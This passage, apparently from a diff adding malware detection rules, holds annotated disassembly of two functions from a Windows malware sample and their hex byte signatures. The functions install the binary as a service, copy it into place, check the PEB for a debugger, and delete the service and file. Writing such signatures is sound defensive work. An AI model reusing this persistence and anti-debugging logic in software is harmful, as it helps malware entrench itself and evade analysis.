.text:0x0040302c 83c9ff or ecx,0xffffffff + .text:0x0040302f 33c0 xor eax,eax + .text:0x00403031 f2ae repnz: scasb + .text:0x00403033 83c7ff add edi,0xffffffff + .text:0x00403036 8bcb mov ecx,ebx + .text:0x00403038 c1e902 shr ecx,2 + .text:0x0040303b f3a5 rep: movsd + .text:0x0040303d 8bcb mov ecx,ebx + .text:0x0040303f 83e103 and ecx,3 + .text:0x00403042 f3a4 rep: movsb + .text:0x00403044 bf2cc14000 mov edi,0x0040c12c + .text:0x00403049 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040304f 83c9ff or ecx,0xffffffff + .text:0x00403052 33c0 xor eax,eax + .text:0x00403054 f2ae repnz: scasb + .text:0x00403056 f7d1 not ecx + .text:0x00403058 2bf9 sub edi,ecx + .text:0x0040305a 8bf7 mov esi,edi + .text:0x0040305c 8bd9 mov ebx,ecx + .text:0x0040305e 8bfa mov edi,edx + .text:0x00403060 83c9ff or ecx,0xffffffff + .text:0x00403063 33c0 xor eax,eax + .text:0x00403065 f2ae repnz: scasb + .text:0x00403067 83c7ff add edi,0xffffffff + .text:0x0040306a 8bcb mov ecx,ebx + .text:0x0040306c c1e902 shr ecx,2 + .text:0x0040306f f3a5 rep: movsd + .text:0x00403071 8bcb mov ecx,ebx + .text:0x00403073 83e103 and ecx,3 + .text:0x00403076 f3a4 rep: movsb + .text:0x00403078 683f000f00 push 0x000f003f + .text:0x0040307d 6a00 push 0 + .text:0x0040307f 6a00 push 0 + .text:0x00403081 ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x00403087 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x0040308d 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x00403094 750a jnz 0x004030a0 + .text:0x00403096 b801000000 mov eax,1 + .text:0x0040309b e90a020000 jmp 0x004032aa + .text:0x004030a0 loc_004030a0: [1 XREFS] + .text:0x004030a0 68ff010f00 push 0x000f01ff + .text:0x004030a5 8b4508 mov eax,dword [ebp + 8] + .text:0x004030a8 50 push eax + .text:0x004030a9 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004030af 51 push ecx + .text:0x004030b0 ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg0,0x000f01ff) + 
.text:0x004030b6 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x004030bc 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x004030c3 746d jz 0x00403132 + .text:0x004030c5 6a00 push 0 + .text:0x004030c7 6a00 push 0 + .text:0x004030c9 6a00 push 0 + .text:0x004030cb 6a00 push 0 + .text:0x004030cd 6a00 push 0 + .text:0x004030cf 6a00 push 0 + .text:0x004030d1 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x004030d7 52 push edx + .text:0x004030d8 6aff push 0xffffffff + .text:0x004030da 6a02 push 2 + .text:0x004030dc 6aff push 0xffffffff + .text:0x004030de 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x004030e4 50 push eax + .text:0x004030e5 ff1508b04000 call dword [0x0040b008] ;advapi32.ChangeServiceConfigA(advapi32.OpenServiceA(<0x00403081>,arg0,0x000f01ff),0xffffffff,2,0xffffffff,local2056,0,0,0,0,0,0) + .text:0x004030eb 85c0 test eax,eax + .text:0x004030ed 7524 jnz 0x00403113 + .text:0x004030ef 8b8df8ebffff mov ecx,dword [ebp - 5128] + .text:0x004030f5 51 push ecx + .text:0x004030f6 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004030b0>) + .text:0x004030fc 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x00403102 52 push edx + .text:0x00403103 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x00403109 b801000000 mov eax,1 + .text:0x0040310e e997010000 jmp 0x004032aa + .text:0x00403113 loc_00403113: [1 XREFS] + .text:0x00403113 8b85f8ebffff mov eax,dword [ebp - 5128] + .text:0x00403119 50 push eax + .text:0x0040311a ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x004030b0>) + .text:0x00403120 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x00403126 51 push ecx + .text:0x00403127 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x0040312d e9ce000000 jmp 0x00403200 + .text:0x00403132 loc_00403132: [1 XREFS] + .text:0x00403132 8b7d08 mov edi,dword [ebp + 8] + .text:0x00403135 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x0040313b 83c9ff 
or ecx,0xffffffff + .text:0x0040313e 33c0 xor eax,eax + .text:0x00403140 f2ae repnz: scasb + .text:0x00403142 f7d1 not ecx + .text:0x00403144 2bf9 sub edi,ecx + .text:0x00403146 8bf7 mov esi,edi + .text:0x00403148 8bc1 mov eax,ecx + .text:0x0040314a 8bfa mov edi,edx + .text:0x0040314c c1e902 shr ecx,2 + .text:0x0040314f f3a5 rep: movsd + .text:0x00403151 8bc8 mov ecx,eax + .text:0x00403153 83e103 and ecx,3 + .text:0x00403156 f3a4 rep: movsb + .text:0x00403158 bf18c14000 mov edi,0x0040c118 + .text:0x0040315d 8d95fcf3ffff lea edx,dword [ebp - 3076] + .text:0x00403163 83c9ff or ecx,0xffffffff + .text:0x00403166 33c0 xor eax,eax + .text:0x00403168 f2ae repnz: scasb + .text:0x0040316a f7d1 not ecx + .text:0x0040316c 2bf9 sub edi,ecx + .text:0x0040316e 8bf7 mov esi,edi + .text:0x00403170 8bd9 mov ebx,ecx + .text:0x00403172 8bfa mov edi,edx + .text:0x00403174 83c9ff or ecx,0xffffffff + .text:0x00403177 33c0 xor eax,eax + .text:0x00403179 f2ae repnz: scasb + .text:0x0040317b 83c7ff add edi,0xffffffff + .text:0x0040317e 8bcb mov ecx,ebx + .text:0x00403180 c1e902 shr ecx,2 + .text:0x00403183 f3a5 rep: movsd + .text:0x00403185 8bcb mov ecx,ebx + .text:0x00403187 83e103 and ecx,3 + .text:0x0040318a f3a4 rep: movsb + .text:0x0040318c 6a00 push 0 + .text:0x0040318e 6a00 push 0 + .text:0x00403190 6a00 push 0 + .text:0x00403192 6a00 push 0 + .text:0x00403194 6a00 push 0 + .text:0x00403196 8d8500fcffff lea eax,dword [ebp - 1024] + .text:0x0040319c 50 push eax + .text:0x0040319d 6a01 push 1 + .text:0x0040319f 6a02 push 2 + .text:0x004031a1 6a20 push 32 + .text:0x004031a3 68ff010f00 push 0x000f01ff + .text:0x004031a8 8d8dfcf3ffff lea ecx,dword [ebp - 3076] + .text:0x004031ae 51 push ecx + .text:0x004031af 8b5508 mov edx,dword [ebp + 8] + .text:0x004031b2 52 push edx + .text:0x004031b3 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x004031b9 50 push eax + .text:0x004031ba ff1510b04000 call dword [0x0040b010] 
;advapi32.CreateServiceA(<0x00403081>,arg0,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0) + .text:0x004031c0 8985f8ebffff mov dword [ebp - 5128],eax + .text:0x004031c6 83bdf8ebffff00 cmp dword [ebp - 5128],0 + .text:0x004031cd 7517 jnz 0x004031e6 + .text:0x004031cf 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004031d5 51 push ecx + .text:0x004031d6 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x004031dc b801000000 mov eax,1 + .text:0x004031e1 e9c4000000 jmp 0x004032aa + .text:0x004031e6 loc_004031e6: [1 XREFS] + .text:0x004031e6 8b95f8ebffff mov edx,dword [ebp - 5128] + .text:0x004031ec 52 push edx + .text:0x004031ed ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(advapi32.CreateServiceA(<0x00403081>,arg0,local3080,0x000f01ff,32,2,1,local1028,0,0,0,0,0)) + .text:0x004031f3 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x004031f9 50 push eax + .text:0x004031fa ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403081>) + .text:0x00403200 loc_00403200: [1 XREFS] + .text:0x00403200 6800040000 push 1024 + .text:0x00403205 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x0040320b 51 push ecx + .text:0x0040320c 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00403212 52 push edx + .text:0x00403213 ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x00403219 85c0 test eax,eax + .text:0x0040321b 750a jnz 0x00403227 + .text:0x0040321d b801000000 mov eax,1 + .text:0x00403222 e983000000 jmp 0x004032aa + .text:0x00403227 loc_00403227: [1 XREFS] + .text:0x00403227 6800040000 push 1024 + .text:0x0040322c 8d85fcefffff lea eax,dword [ebp - 4100] + .text:0x00403232 50 push eax + .text:0x00403233 6a00 push 0 + .text:0x00403235 ff155cb04000 call dword [0x0040b05c] ;kernel32.GetModuleFileNameA(0,local4104,1024) + .text:0x0040323b 85c0 test eax,eax + .text:0x0040323d 7507 jnz 0x00403246 + .text:0x0040323f b801000000 mov eax,1 + 
.text:0x00403244 eb64 jmp 0x004032aa + .text:0x00403246 loc_00403246: [1 XREFS] + .text:0x00403246 6a00 push 0 + .text:0x00403248 8d8dfcf7ffff lea ecx,dword [ebp - 2052] + .text:0x0040324e 51 push ecx + .text:0x0040324f 8d95fcefffff lea edx,dword [ebp - 4100] + .text:0x00403255 52 push edx + .text:0x00403256 ff1534b04000 call dword [0x0040b034] ;kernel32.CopyFileA(local4104,local2056,0) + .text:0x0040325c 85c0 test eax,eax + .text:0x0040325e 7507 jnz 0x00403267 + .text:0x00403260 b801000000 mov eax,1 + .text:0x00403265 eb43 jmp 0x004032aa + .text:0x00403267 loc_00403267: [1 XREFS] + .text:0x00403267 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x0040326d 50 push eax + .text:0x0040326e e83de7ffff call 0x004019b0 ;sub_004019b0(local2056) + .text:0x00403273 83c404 add esp,4 + .text:0x00403276 85c0 test eax,eax + .text:0x00403278 7407 jz 0x00403281 + .text:0x0040327a b801000000 mov eax,1 + .text:0x0040327f eb29 jmp 0x004032aa + .text:0x00403281 loc_00403281: [1 XREFS] + .text:0x00403281 6814c14000 push 0x0040c114 + .text:0x00403286 6810c14000 push 0x0040c110 + .text:0x0040328b 68e8c04000 push 0x0040c0e8 + .text:0x00403290 68e4c04000 push 0x0040c0e4 + .text:0x00403295 e836dfffff call 0x004011d0 ;sub_004011d0(0x0040c0e4,0x0040c0e8,0x0040c110,0x0040c114) + .text:0x0040329a 83c410 add esp,16 + .text:0x0040329d 85c0 test eax,eax + .text:0x0040329f 7407 jz 0x004032a8 + .text:0x004032a1 b801000000 mov eax,1 + .text:0x004032a6 eb02 jmp 0x004032aa + .text:0x004032a8 loc_004032a8: [1 XREFS] + .text:0x004032a8 33c0 xor eax,eax + .text:0x004032aa loc_004032aa: [9 XREFS] + .text:0x004032aa 5f pop edi + .text:0x004032ab 5e pop esi + .text:0x004032ac 5b pop ebx + .text:0x004032ad 8be5 mov esp,ebp + .text:0x004032af 5d pop ebp + .text:0x004032b0 c3 ret + */ + $c43 = { 55 8B EC B8 14 14 00 00 E8 ?? ?? ?? ?? 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? ?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? 
?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 45 ?? 50 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 8D 95 ?? ?? ?? ?? 52 6A FF 6A 02 6A FF 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8B 7D ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 BF 18 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 6A 00 6A 00 6A 00 6A 00 6A 00 8D 85 ?? ?? ?? ?? 50 6A 01 6A 02 6A 20 68 FF 01 0F 00 8D 8D ?? ?? ?? ?? 51 8B 55 ?? 52 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 
B8 01 00 00 00 E9 ?? ?? ?? ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 6A 00 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 6A 00 8D 8D ?? ?? ?? ?? 51 8D 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 85 C0 75 ?? B8 01 00 00 00 EB ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 04 85 C0 74 ?? B8 01 00 00 00 EB ?? 68 14 C1 40 00 68 10 C1 40 00 68 E8 C0 40 00 68 E4 C0 40 00 E8 ?? ?? ?? ?? 83 C4 10 85 C0 74 ?? B8 01 00 00 00 EB ?? 33 C0 5F 5E 5B 8B E5 5D C3 } + /* +function at 0x004032c0@7faafc7e4a5c736ebfee6abbbc812d80 with 4 features: + - check for PEB NtGlobalFlag flag + - delete file + - delete service + - query environment variable + .text:0x004032c0 + .text:0x004032c0 FUNC: int cdecl sub_004032c0( int arg0, ) [4 XREFS] + .text:0x004032c0 + .text:0x004032c0 Stack Variables: (offset from initial top of stack) + .text:0x004032c0 4: int arg0 + .text:0x004032c0 -1028: int local1028 + .text:0x004032c0 -1032: int local1032 + .text:0x004032c0 -2056: int local2056 + .text:0x004032c0 -3080: int local3080 + .text:0x004032c0 -3084: int local3084 + .text:0x004032c0 -3088: int local3088 + .text:0x004032c0 -3092: int local3092 + .text:0x004032c0 -3096: int local3096 + .text:0x004032c0 + .text:0x004032c0 55 push ebp + .text:0x004032c1 8bec mov ebp,esp + .text:0x004032c3 81ec140c0000 sub esp,3092 + .text:0x004032c9 53 push ebx + .text:0x004032ca 56 push esi + .text:0x004032cb 57 push edi + .text:0x004032cc c785f0f3ffff0000 mov dword [ebp - 3088],0 + .text:0x004032d6 c785ecf3ffff0000 mov dword [ebp - 3092],0 + .text:0x004032e0 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x004032e6 8a5802 mov bl,byte [eax + 2] + .text:0x004032e9 889df4f3ffff mov byte [ebp - 3084],bl + .text:0x004032ef 0fbe85f4f3ffff movsx eax,byte [ebp - 3084] + .text:0x004032f6 85c0 test eax,eax + .text:0x004032f8 7405 jz 0x004032ff + .text:0x004032fa e801ddffff call 0x00401000 ;sub_00401000() + .text:0x004032ff loc_004032ff: [1 XREFS] + .text:0x004032ff 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00403305 
8b4018 mov eax,dword [eax + 24] + .text:0x00403308 3e8b4010 ds: mov eax,dword [eax + 16] + .text:0x0040330c 8985f0f3ffff mov dword [ebp - 3088],eax + .text:0x00403312 83bdf0f3ffff00 cmp dword [ebp - 3088],0 + .text:0x00403319 7405 jz 0x00403320 + .text:0x0040331b e8e0dcffff call 0x00401000 ;sub_00401000() + .text:0x00403320 loc_00403320: [1 XREFS] + .text:0x00403320 64a130000000 fs: mov eax,dword [0x00000030] + .text:0x00403326 3e8b4068 ds: mov eax,dword [eax + 104] + .text:0x0040332a 83e870 sub eax,112 + .text:0x0040332d 8985ecf3ffff mov dword [ebp - 3092],eax + .text:0x00403333 83bdecf3ffff00 cmp dword [ebp - 3092],0 + .text:0x0040333a 7505 jnz 0x00403341 + .text:0x0040333c e8bfdcffff call 0x00401000 ;sub_00401000() + .text:0x00403341 loc_00403341: [1 XREFS] + .text:0x00403341 683f000f00 push 0x000f003f + .text:0x00403346 6a00 push 0 + .text:0x00403348 6a00 push 0 + .text:0x0040334a ff1500b04000 call dword [0x0040b000] ;advapi32.OpenSCManagerA(0,0,0x000f003f) + .text:0x00403350 8985fcfbffff mov dword [ebp - 1028],eax + .text:0x00403356 83bdfcfbffff00 cmp dword [ebp - 1028],0 + .text:0x0040335d 750a jnz 0x00403369 + .text:0x0040335f b801000000 mov eax,1 + .text:0x00403364 e9b3010000 jmp 0x0040351c + .text:0x00403369 loc_00403369: [1 XREFS] + .text:0x00403369 68ff010f00 push 0x000f01ff + .text:0x0040336e 8b4d08 mov ecx,dword [ebp + 8] + .text:0x00403371 51 push ecx + .text:0x00403372 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x00403378 52 push edx + .text:0x00403379 ff1504b04000 call dword [0x0040b004] ;advapi32.OpenServiceA(advapi32.OpenSCManagerA(0,0,0x000f003f),arg0,0x000f01ff) + .text:0x0040337f 8985f8f3ffff mov dword [ebp - 3080],eax + .text:0x00403385 83bdf8f3ffff00 cmp dword [ebp - 3080],0 + .text:0x0040338c 7517 jnz 0x004033a5 + .text:0x0040338e 8b85fcfbffff mov eax,dword [ebp - 1028] + .text:0x00403394 50 push eax + .text:0x00403395 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x0040334a>) + .text:0x0040339b b801000000 mov eax,1 
+ .text:0x004033a0 e977010000 jmp 0x0040351c + .text:0x004033a5 loc_004033a5: [1 XREFS] + .text:0x004033a5 8b8df8f3ffff mov ecx,dword [ebp - 3080] + .text:0x004033ab 51 push ecx + .text:0x004033ac ff1528b04000 call dword [0x0040b028] ;advapi32.DeleteService(advapi32.OpenServiceA(<0x0040334a>,arg0,0x000f01ff)) + .text:0x004033b2 85c0 test eax,eax + .text:0x004033b4 7524 jnz 0x004033da + .text:0x004033b6 8b95fcfbffff mov edx,dword [ebp - 1028] + .text:0x004033bc 52 push edx + .text:0x004033bd ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x0040334a>) + .text:0x004033c3 8b85f8f3ffff mov eax,dword [ebp - 3080] + .text:0x004033c9 50 push eax + .text:0x004033ca ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403379>) + .text:0x004033d0 b801000000 mov eax,1 + .text:0x004033d5 e942010000 jmp 0x0040351c + .text:0x004033da loc_004033da: [1 XREFS] + .text:0x004033da 8b8dfcfbffff mov ecx,dword [ebp - 1028] + .text:0x004033e0 51 push ecx + .text:0x004033e1 ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x0040334a>) + .text:0x004033e7 8b95f8f3ffff mov edx,dword [ebp - 3080] + .text:0x004033ed 52 push edx + .text:0x004033ee ff150cb04000 call dword [0x0040b00c] ;advapi32.CloseServiceHandle(<0x00403379>) + .text:0x004033f4 6800040000 push 1024 + .text:0x004033f9 8d85fcf3ffff lea eax,dword [ebp - 3076] + .text:0x004033ff 50 push eax + .text:0x00403400 e86bfaffff call 0x00402e70 ;sub_00402e70(local3080) + .text:0x00403405 83c408 add esp,8 + .text:0x00403408 85c0 test eax,eax + .text:0x0040340a 740a jz 0x00403416 + .text:0x0040340c b801000000 mov eax,1 + .text:0x00403411 e906010000 jmp 0x0040351c + .text:0x00403416 loc_00403416: [1 XREFS] + .text:0x00403416 bf34c14000 mov edi,0x0040c134 + .text:0x0040341b 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x00403421 83c9ff or ecx,0xffffffff + .text:0x00403424 33c0 xor eax,eax + .text:0x00403426 f2ae repnz: scasb + .text:0x00403428 f7d1 not ecx + .text:0x0040342a 2bf9 sub 
edi,ecx + .text:0x0040342c 8bf7 mov esi,edi + .text:0x0040342e 8bc1 mov eax,ecx + .text:0x00403430 8bfa mov edi,edx + .text:0x00403432 c1e902 shr ecx,2 + .text:0x00403435 f3a5 rep: movsd + .text:0x00403437 8bc8 mov ecx,eax + .text:0x00403439 83e103 and ecx,3 + .text:0x0040343c f3a4 rep: movsb + .text:0x0040343e 8dbdfcf3ffff lea edi,dword [ebp - 3076] + .text:0x00403444 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040344a 83c9ff or ecx,0xffffffff + .text:0x0040344d 33c0 xor eax,eax + .text:0x0040344f f2ae repnz: scasb + .text:0x00403451 f7d1 not ecx + .text:0x00403453 2bf9 sub edi,ecx + .text:0x00403455 8bf7 mov esi,edi + .text:0x00403457 8bd9 mov ebx,ecx + .text:0x00403459 8bfa mov edi,edx + .text:0x0040345b 83c9ff or ecx,0xffffffff + .text:0x0040345e 33c0 xor eax,eax + .text:0x00403460 f2ae repnz: scasb + .text:0x00403462 83c7ff add edi,0xffffffff + .text:0x00403465 8bcb mov ecx,ebx + .text:0x00403467 c1e902 shr ecx,2 + .text:0x0040346a f3a5 rep: movsd + .text:0x0040346c 8bcb mov ecx,ebx + .text:0x0040346e 83e103 and ecx,3 + .text:0x00403471 f3a4 rep: movsb + .text:0x00403473 bf2cc14000 mov edi,0x0040c12c + .text:0x00403478 8d9500fcffff lea edx,dword [ebp - 1024] + .text:0x0040347e 83c9ff or ecx,0xffffffff + .text:0x00403481 33c0 xor eax,eax + .text:0x00403483 f2ae repnz: scasb + .text:0x00403485 f7d1 not ecx + .text:0x00403487 2bf9 sub edi,ecx + .text:0x00403489 8bf7 mov esi,edi + .text:0x0040348b 8bd9 mov ebx,ecx + .text:0x0040348d 8bfa mov edi,edx + .text:0x0040348f 83c9ff or ecx,0xffffffff + .text:0x00403492 33c0 xor eax,eax + .text:0x00403494 f2ae repnz: scasb + .text:0x00403496 83c7ff add edi,0xffffffff + .text:0x00403499 8bcb mov ecx,ebx + .text:0x0040349b c1e902 shr ecx,2 + .text:0x0040349e f3a5 rep: movsd + .text:0x004034a0 8bcb mov ecx,ebx + .text:0x004034a2 83e103 and ecx,3 + .text:0x004034a5 f3a4 rep: movsb + .text:0x004034a7 6800040000 push 1024 + .text:0x004034ac 8d85fcf7ffff lea eax,dword [ebp - 2052] + .text:0x004034b2 50 push eax + 
.text:0x004034b3 8d8d00fcffff lea ecx,dword [ebp - 1024] + .text:0x004034b9 51 push ecx + .text:0x004034ba ff1530b04000 call dword [0x0040b030] ;kernel32.ExpandEnvironmentStringsA(local1028,local2056,1024) + .text:0x004034c0 85c0 test eax,eax + .text:0x004034c2 7507 jnz 0x004034cb + .text:0x004034c4 b801000000 mov eax,1 + .text:0x004034c9 eb51 jmp 0x0040351c + .text:0x004034cb loc_004034cb: [1 XREFS] + .text:0x004034cb 8d95fcf7ffff lea edx,dword [ebp - 2052] + .text:0x004034d1 52 push edx + .text:0x004034d2 ff1560b04000 call dword [0x0040b060] ;kernel32.DeleteFileA(local2056) + .text:0x004034d8 85c0 test eax,eax + .text:0x004034da 7507 jnz 0x004034e3 + .text:0x004034dc b801000000 mov eax,1 + .text:0x004034e1 eb39 jmp 0x0040351c + .text:0x004034e3 loc_004034e3: [1 XREFS] + .text:0x004034e3 6860eb4000 push 0x0040eb60 + .text:0x004034e8 6860eb4000 push 0x0040eb60 + .text:0x004034ed 6860eb4000 push 0x0040eb60 + .text:0x004034f2 6860eb4000 push 0x0040eb60 + .text:0x004034f7 e8d4dcffff call 0x004011d0 ;sub_004011d0(0x0040eb60,0x0040eb60,0x0040eb60,0x0040eb60) + .text:0x004034fc 83c410 add esp,16 + .text:0x004034ff 85c0 test eax,eax + .text:0x00403501 7407 jz 0x0040350a + .text:0x00403503 b801000000 mov eax,1 + .text:0x00403508 eb12 jmp 0x0040351c + .text:0x0040350a loc_0040350a: [1 XREFS] + .text:0x0040350a e8d1deffff call 0x004013e0 ;sub_004013e0() + .text:0x0040350f 85c0 test eax,eax + .text:0x00403511 7407 jz 0x0040351a + .text:0x00403513 b801000000 mov eax,1 + .text:0x00403518 eb02 jmp 0x0040351c + .text:0x0040351a loc_0040351a: [1 XREFS] + .text:0x0040351a 33c0 xor eax,eax + .text:0x0040351c loc_0040351c: [8 XREFS] + .text:0x0040351c 5f pop edi + .text:0x0040351d 5e pop esi + .text:0x0040351e 5b pop ebx + .text:0x0040351f 8be5 mov esp,ebp + .text:0x00403521 5d pop ebp + .text:0x00403522 c3 ret + */ + $c44 = { 55 8B EC 81 EC 14 0C 00 00 53 56 57 C7 85 ?? ?? ?? ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 00 00 00 00 64 A1 ?? ?? ?? ?? 8A 58 ?? 88 9D ?? ?? ?? ?? 0F BE 85 ?? ?? ?? 
?? 85 C0 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 8B 40 ?? 3E 8B 40 ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 74 ?? E8 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 3E 8B 40 ?? 83 E8 70 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? E8 ?? ?? ?? ?? 68 3F 00 0F 00 6A 00 6A 00 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 68 FF 01 0F 00 8B 4D ?? 51 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 00 75 ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? B8 01 00 00 00 E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 52 FF 15 ?? ?? ?? ?? 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 08 85 C0 74 ?? B8 01 00 00 00 E9 ?? ?? ?? ?? BF 34 C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B C1 8B FA C1 E9 02 F3 A5 8B C8 83 E1 03 F3 A4 8D BD ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 BF 2C C1 40 00 8D 95 ?? ?? ?? ?? 83 C9 FF 33 C0 F2 AE F7 D1 2B F9 8B F7 8B D9 8B FA 83 C9 FF 33 C0 F2 AE 83 C7 FF 8B CB C1 E9 02 F3 A5 8B CB 83 E1 03 F3 A4 68 00 04 00 00 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 85 C0 75 